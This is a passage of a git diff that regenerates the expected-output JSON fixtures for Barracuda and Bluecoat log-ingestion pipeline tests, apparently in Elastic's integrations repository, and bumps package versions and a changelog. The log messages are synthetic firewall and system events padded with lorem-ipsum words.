{ - "ingested": "2021-06-09T09:46:41.485020600Z" + "ingested": "2021-12-14T14:35:58.799882792Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: LB-doloreeu elillumq CreateServer =loremeum", "event": { - "ingested": "2021-06-09T09:46:41.485024200Z" + "ingested": "2021-12-14T14:35:58.799883167Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: WebLog-radi ula itsed: SapCtx=rad,SapId=olupta, ididu", "event": { - "ingested": "2021-06-09T09:46:41.485027800Z" + "ingested": "2021-12-14T14:35:58.799883547Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:xcepte] New attack definition version 1.4012 is available", "event": { - "ingested": "2021-06-09T09:46:41.485031400Z" + "ingested": "2021-12-14T14:35:58.799884108Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Monitoring links: lo4933", "event": { - "ingested": "2021-06-09T09:46:41.485035100Z" + "ingested": "2021-12-14T14:35:58.799884474Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:doconse] One of the RAID arrays is degrading.", "event": { - "ingested": "2021-06-09T09:46:41.485038700Z" + "ingested": "2021-12-14T14:35:58.799884820Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: odite atn It is recommended to configure cookie_encryption_key_expiry atleast 7 days ahead of current time., sectet", "event": { - "ingested": "2021-06-09T09:46:41.485042400Z" + "ingested": "2021-12-14T14:35:58.799885168Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: LB-tet voluptas ActiveServerOutOfBandMonitorAttr =inv", "event": { - "ingested": "2021-06-09T09:46:41.485046Z" + "ingested": "2021-12-14T14:35:58.799885518Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: [ALERT:obeata] Configuration size is pexeaco which exceeds the ercitati safe limit. Please check your configuration.", "event": { - "ingested": "2021-06-09T09:46:41.485049700Z" + "ingested": "2021-12-14T14:35:58.799885995Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode change: urEx,labo", "event": { - "ingested": "2021-06-09T09:46:41.485053700Z" + "ingested": "2021-12-14T14:35:58.799886363Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Event manager startup succeeded.", "event": { - "ingested": "2021-06-09T09:46:41.485057500Z" + "ingested": "2021-12-14T14:35:58.799886720Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: LB-Maloru lapariat SetServerdmin=oinBCSed", "event": { - "ingested": "2021-06-09T09:46:41.485061200Z" + "ingested": "2021-12-14T14:35:58.799887082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully stopped STM.", "event": { - "ingested": "2021-06-09T09:46:41.485064900Z" + "ingested": "2021-12-14T14:35:58.799887433Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: luptate Initiating config_agent database commit phase.", "event": { - "ingested": "2021-06-09T09:46:41.485068400Z" + "ingested": "2021-12-14T14:35:58.799887806Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: LB-isistena Malorum SetSapquelauda=enderit", "event": { - "ingested": "2021-06-09T09:46:41.485072100Z" + "ingested": "2021-12-14T14:35:58.799888155Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Forwarding log messages to syslog host #equun, address=10.4.65.246", "event": { - "ingested": "2021-06-09T09:46:41.485075800Z" + "ingested": "2021-12-14T14:35:58.799888613Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:exer] New attack definition version 1.481 is available", "event": { - "ingested": "2021-06-09T09:46:41.485079400Z" + "ingested": "2021-12-14T14:35:58.799888967Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Event manager startup succeeded.", "event": { - "ingested": "2021-06-09T09:46:41.485083400Z" + "ingested": "2021-12-14T14:35:58.799889323Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "event": { - "ingested": "2021-06-09T09:46:41.485087800Z" + "ingested": "2021-12-14T14:35:58.799890264Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: isnisiu aspernat Update succeeded", "event": { - "ingested": "2021-06-09T09:46:41.485092500Z" + "ingested": "2021-12-14T14:35:58.799890711Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for mquel release.", "event": { - "ingested": "2021-06-09T09:46:41.485096300Z" + "ingested": "2021-12-14T14:35:58.799891077Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from ueporr to ptate", "event": { - "ingested": "2021-06-09T09:46:41.485100200Z" + "ingested": "2021-12-14T14:35:58.799891456Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:onsequ] enp0s7094: link is up", "event": { - "ingested": "2021-06-09T09:46:41.485103700Z" + "ingested": "2021-12-14T14:35:58.799891817Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: iquip tDuisau It is recommended to configure cookie_encryption_key_expiry atleast 7 days ahead of current time., amali", "event": { - "ingested": "2021-06-09T09:46:41.485107300Z" + "ingested": "2021-12-14T14:35:58.799892174Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Event manager startup succeeded.", "event": { - "ingested": "2021-06-09T09:46:41.485111200Z" + "ingested": "2021-12-14T14:35:58.799892530Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Started monitoring", "event": { - "ingested": "2021-06-09T09:46:41.485114800Z" + "ingested": "2021-12-14T14:35:58.799892892Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: LB-mveniam rvelill EnableServer =iame", "event": { - "ingested": "2021-06-09T09:46:41.485118500Z" + "ingested": "2021-12-14T14:35:58.799893373Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: number of stm worker threads iseuf", "event": { - "ingested": "2021-06-09T09:46:41.485122400Z" + "ingested": "2021-12-14T14:35:58.799893731Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: WebLog-ipiscin idolore turExce: SapCtx=modoc,SapId=mdolors, borios", "event": { - "ingested": "2021-06-09T09:46:41.485126100Z" + "ingested": "2021-12-14T14:35:58.799894091Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully stopped STM.", "event": { - "ingested": "2021-06-09T09:46:41.485129900Z" + "ingested": "2021-12-14T14:35:58.799894448Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Forwarding log messages to syslog host #ccusa, address=10.58.33.30", "event": { - "ingested": "2021-06-09T09:46:41.485133700Z" + "ingested": "2021-12-14T14:35:58.799894796Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:uiadolo] eth321: link is up", "event": { - "ingested": "2021-06-09T09:46:41.485137500Z" + "ingested": "2021-12-14T14:35:58.799895154Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: rsi ciduntut Update succeeded", "event": { - "ingested": "2021-06-09T09:46:41.485141100Z" + "ingested": "2021-12-14T14:35:58.799895507Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: radipis RPC Name =isa, RPC Result: aal", "event": { - "ingested": "2021-06-09T09:46:41.485145300Z" + "ingested": "2021-12-14T14:35:58.799895862Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for ris release.", "event": { - "ingested": "2021-06-09T09:46:41.485149100Z" + "ingested": "2021-12-14T14:35:58.799896222Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: aliqui rcitat Update succeeded", "event": { - "ingested": "2021-06-09T09:46:41.485152600Z" + "ingested": "2021-12-14T14:35:58.799896570Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: aeconse Initiating config_agent database commit phase.", "event": { - "ingested": "2021-06-09T09:46:41.485159200Z" + "ingested": "2021-12-14T14:35:58.799896943Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Started monitoring", "event": { - "ingested": "2021-06-09T09:46:41.485163900Z" + "ingested": "2021-12-14T14:35:58.799897305Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: iaecon ipexea Update succeeded", "event": { - "ingested": "2021-06-09T09:46:41.485167700Z" + "ingested": "2021-12-14T14:35:58.799897655Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from nulapa to cillu", "event": { - "ingested": "2021-06-09T09:46:41.485171300Z" + "ingested": "2021-12-14T14:35:58.799898010Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:ectetura] Firmware storage exceeds didun", "event": { - "ingested": "2021-06-09T09:46:41.485174800Z" + "ingested": "2021-12-14T14:35:58.799898374Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: rcit nul Received put-tree command", "event": { - "ingested": "2021-06-09T09:46:41.485178300Z" + "ingested": "2021-12-14T14:35:58.799898734Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:aliquaU] New attack definition version 1.1278 is available", "event": { - "ingested": "2021-06-09T09:46:41.485181800Z" + "ingested": "2021-12-14T14:35:58.799899177Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:amei] New attack definition version 1.7778 is available", "event": { - "ingested": "2021-06-09T09:46:41.485185400Z" + "ingested": "2021-12-14T14:35:58.799899544Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:gelitse] New attack definition version 1.3018 is available", "event": { - "ingested": "2021-06-09T09:46:41.485188800Z" + "ingested": "2021-12-14T14:35:58.799899902Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from iceroin to qui", "event": { - "ingested": "2021-06-09T09:46:41.485192500Z" + "ingested": "2021-12-14T14:35:58.799900277Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from pariatu to issusc", "event": { - "ingested": "2021-06-09T09:46:41.485196300Z" + "ingested": "2021-12-14T14:35:58.799900709Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: FAILOVE-roinBCSe oreet Stateful Failover Module initialized.", "event": { - "ingested": "2021-06-09T09:46:41.485199800Z" + "ingested": "2021-12-14T14:35:58.799901066Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Committing UI configuration.", "event": { - "ingested": "2021-06-09T09:46:41.485203300Z" + "ingested": "2021-12-14T14:35:58.799901422Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "event": { - "ingested": "2021-06-09T09:46:41.485206900Z" + "ingested": "2021-12-14T14:35:58.799901783Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from ernat to Ute", "event": { - "ingested": "2021-06-09T09:46:41.485210400Z" + "ingested": "2021-12-14T14:35:58.799902150Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "event": { - "ingested": "2021-06-09T09:46:41.485213900Z" + "ingested": "2021-12-14T14:35:58.799902511Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "event": { - "ingested": "2021-06-09T09:46:41.485217200Z" + "ingested": "2021-12-14T14:35:58.799902863Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: RespPage-rinrepr rvelill CreateRP: Response Page mve created successfully", "event": { - "ingested": "2021-06-09T09:46:41.485220700Z" + "ingested": "2021-12-14T14:35:58.799903213Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: [ALERT:ineav] Configuration size is onp which exceeds the gnaaliqu safe limit. Please check your configuration.", "event": { - "ingested": "2021-06-09T09:46:41.485224100Z" + "ingested": "2021-12-14T14:35:58.799903568Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to never bypass.", "event": { - "ingested": "2021-06-09T09:46:41.485227400Z" + "ingested": "2021-12-14T14:35:58.799903924Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: quaea RPC Name =eetd, RPC Result: fdeFin", "event": { - "ingested": "2021-06-09T09:46:41.485230700Z" + "ingested": "2021-12-14T14:35:58.799904313Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: number of stm worker threads isrro", "event": { - "ingested": "2021-06-09T09:46:41.485234100Z" + "ingested": "2021-12-14T14:35:58.799904679Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: tutlabo Initiating config_agent database commit phase.", "event": { - "ingested": "2021-06-09T09:46:41.485237500Z" + "ingested": "2021-12-14T14:35:58.799905033Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for pli release.", "event": { - "ingested": "2021-06-09T09:46:41.485241100Z" + "ingested": "2021-12-14T14:35:58.799905383Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: erit Initiating config_agent database commit phase.", "event": { - "ingested": "2021-06-09T09:46:41.485244700Z" + "ingested": "2021-12-14T14:35:58.799905738Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for mod release.", "event": { - "ingested": "2021-06-09T09:46:41.485248Z" + "ingested": "2021-12-14T14:35:58.799906112Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for lamcolab release.", "event": { - "ingested": "2021-06-09T09:46:41.485251500Z" + "ingested": "2021-12-14T14:35:58.799906464Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from estlab to tis", "event": { - "ingested": "2021-06-09T09:46:41.485255100Z" + "ingested": "2021-12-14T14:35:58.799906821Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:uamqua] Firmware storage exceeds labo", "event": { - "ingested": "2021-06-09T09:46:41.485258500Z" + "ingested": "2021-12-14T14:35:58.799907184Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Migrating configuration from tfugit to taspern", "event": { - "ingested": "2021-06-09T09:46:41.485262Z" + "ingested": "2021-12-14T14:35:58.799908502Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eventmgr: Forwarding log messages to syslog host #meiusm, address=10.48.248.158", "event": { - "ingested": "2021-06-09T09:46:41.485265600Z" + "ingested": "2021-12-14T14:35:58.799908954Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "event": { - "ingested": "2021-06-09T09:46:41.485269200Z" + "ingested": "2021-12-14T14:35:58.799909318Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: number of stm worker threads isonula", "event": { - "ingested": "2021-06-09T09:46:41.485272600Z" + "ingested": "2021-12-14T14:35:58.799909681Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: FTPSVC-nimi ilmoles Ftp proxy initialized labor", "event": { - "ingested": "2021-06-09T09:46:41.485276900Z" + "ingested": "2021-12-14T14:35:58.799910034Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: [ALERT:atev] One of the RAID arrays is degrading.", "event": { - "ingested": "2021-06-09T09:46:41.485280400Z" + "ingested": "2021-12-14T14:35:58.799910387Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: amaliq ept Received put-tree command", "event": { - "ingested": "2021-06-09T09:46:41.485283800Z" + "ingested": "2021-12-14T14:35:58.799910764Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to BYPASS (ectetura).", "event": { - "ingested": "2021-06-09T09:46:41.485287300Z" + "ingested": "2021-12-14T14:35:58.799911115Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: COOKIE-icab quiado scipit = quiavolu", "event": { - "ingested": "2021-06-09T09:46:41.485290800Z" + "ingested": "2021-12-14T14:35:58.799911468Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to never bypass.", "event": { - "ingested": "2021-06-09T09:46:41.485294400Z" + "ingested": "2021-12-14T14:35:58.799911818Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: CACHE-oconseq tsedd untin SapCtx susc, SapId amr, Return Code success", "event": { - "ingested": "2021-06-09T09:46:41.485297800Z" + "ingested": "2021-12-14T14:35:58.799912188Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM: aps-ddoeius tautfugi ParamProtectionClonePatterns: Old:cin, New:fugia, PatternsNode:olors", "event": { - "ingested": "2021-06-09T09:46:41.485301300Z" + "ingested": "2021-12-14T14:35:58.799912544Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for admi release.", "event": { - "ingested": "2021-06-09T09:46:41.485304700Z" + "ingested": "2021-12-14T14:35:58.799912904Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "CONFIG_AGENT: aecons Initiating config_agent database commit phase.", "event": { - "ingested": "2021-06-09T09:46:41.485308300Z" + "ingested": "2021-12-14T14:35:58.799913271Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Monitoring links: eth801", "event": { - "ingested": "2021-06-09T09:46:41.485312Z" + "ingested": "2021-12-14T14:35:58.799913631Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Started monitoring", "event": { - "ingested": "2021-06-09T09:46:41.485315600Z" + "ingested": "2021-12-14T14:35:58.799913986Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:ntoc] New attack definition version 1.7781 is available", "event": { - "ingested": "2021-06-09T09:46:41.485319200Z" + "ingested": "2021-12-14T14:35:58.799914351Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "INSTALL: Loading the snapshot for stru release.", "event": { - "ingested": "2021-06-09T09:46:41.485322700Z" + "ingested": "2021-12-14T14:35:58.799914719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Monitoring links: enp0s6182", "event": { - "ingested": "2021-06-09T09:46:41.485326200Z" + "ingested": "2021-12-14T14:35:58.799915070Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: number of stm worker threads isumwri", "event": { - "ingested": "2021-06-09T09:46:41.485329600Z" + "ingested": "2021-12-14T14:35:58.799915431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to never bypass.", "event": { - "ingested": "2021-06-09T09:46:41.485333100Z" + "ingested": "2021-12-14T14:35:58.799915784Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BYPASS: Mode set to BYPASS (eniamqu).", "event": { - "ingested": "2021-06-09T09:46:41.485336700Z" + "ingested": "2021-12-14T14:35:58.799916136Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "UPDATE: [ALERT:tco] New attack definition version 1.6840 is available", "event": { - "ingested": "2021-06-09T09:46:41.485340400Z" + "ingested": "2021-12-14T14:35:58.799916487Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "event": { - "ingested": "2021-06-09T09:46:41.485343900Z" + "ingested": "2021-12-14T14:35:58.799916843Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Initializing STM.", "event": { - "ingested": "2021-06-09T09:46:41.485347600Z" + "ingested": "2021-12-14T14:35:58.799917195Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "event": { - "ingested": "2021-06-09T09:46:41.485351200Z" + "ingested": "2021-12-14T14:35:58.799917548Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "PROCMON: Started monitoring", "event": { - "ingested": "2021-06-09T09:46:41.485354800Z" + "ingested": "2021-12-14T14:35:58.799917898Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/barracuda/manifest.yml b/packages/barracuda/manifest.yml index 505b7dc42fc..c63dddf2464 100644 --- a/packages/barracuda/manifest.yml +++ b/packages/barracuda/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: barracuda title: Barracuda Logs -version: 0.7.0 +version: 0.7.1 description: Collect spam and web application firewall logs from Barracuda devices with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/bluecoat/changelog.yml b/packages/bluecoat/changelog.yml index 68563ce7859..9dda70fbbe5 100644 --- a/packages/bluecoat/changelog.yml +++ b/packages/bluecoat/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json index b82c39c89cc..39bf58fd7f2 100644 --- a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "ntpd[1001]: kernel time sync enabled utl", "event": { - "ingested": "2021-06-09T09:50:38.142122500Z" + "ingested": "2021-12-14T14:36:02.455690762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "restorecond: : Reset file context quasiarc: liqua", "event": { - "ingested": "2021-06-09T09:50:38.142166900Z" + "ingested": "2021-12-14T14:36:02.455693347Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "auditd[5699]: Audit daemon rotating log files", "event": { - "ingested": "2021-06-09T09:50:38.142174400Z" + "ingested": "2021-12-14T14:36:02.455693771Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "anacron[5066]: Normal exit ehend", "event": { - "ingested": "2021-06-09T09:50:38.142200100Z" + "ingested": "2021-12-14T14:36:02.455694124Z" + }, + "ecs": { + "version": 